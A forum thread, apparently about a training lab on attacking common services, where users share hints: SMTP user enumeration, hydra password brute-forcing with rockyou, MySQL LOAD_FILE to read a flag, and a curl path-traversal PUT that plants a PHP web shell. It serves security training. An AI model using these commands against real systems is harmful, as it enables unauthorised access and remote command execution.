Attacking Common Services - Easy

If anyone is else is getting the error: mysql: command not found:
It seems that mysql isn’t currently installed in the attackbox so you have to do it yourself.
type: sudo apt install mariadb-client to get it going

I agree with everyone that this password should really be a password from the resources list… however, you must enumerate the password using rockyou

smtp-user-enum xxxxxxxxxx 25 -m RCPT -d inlanefreight.htb -U usernames
hydra -l xxxxxx@inlanefreight.htb -P rockyou xxxxxxxxxx smtp -t 40 -s -vvv

:heart:

1 Like

Yeah I didn’t like the first part. I was able to find the username no problem. But what to do with this information was annoying. Should be sticking to the resources in the module if that’s what you have been using this entire module. However, once you get into the database. That is interesting and a good learning experience into webshells. I didn’t bother with FTP.

fr I wasted so much time thinking that the password would be in the resource list. Like whats the point of the resources anymore.

Hello for everyone;

If someone is always stuck in this part and needs some hints abt how to get the flag ;
1/ Do your enumeration and get the necessary creds,
2/ Try these with the active services on the target machine,
3/ If Else you tried to use mysql => SELECT LOAD_FILE(CONCAT(@@basedir, ‘Path_to_the_flag\flag.txt’));

-----G00d H4Ck1N9------

STOP OVERHEADING
Finding a web server doesn’t mean you need to exploit it. Avoid overcomplicating the process; simple methods often yield better results.

  1. Access MySQL: Connect using the obtained credentials.
  2. Read a File: Execute LOAD_FILE to retrieve the file contents.
1 Like

If you have problems with hydra terminate the machine and start a new one.
I wasted a lot of time thinking i was wrong but the problem was from the machine.

Also if you have the following error for SQL
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it
Add --skip-ssl at the final of the command, it should look like this:
mysql -u <user> -p<pass> -h <ip> --skip-ssl

1 Like

If you find credentials ,there is another way to get the flag. Latest FTP Vulnerabilities section mentions CoreFTP before build 727 vulnerability. It is easy as mysql way. File traversal is the key.

curl -k -X PUT -H “Host: 10.10.10.10” --basic -u YYYY:XXXX --data-binary ‘<?php system($_GET['cmd']); ?>’ --path-as-is https://10.10.10.10/../xampp/htdocs/backd.php

C:/Users/Administrator/Desktop/flag.txt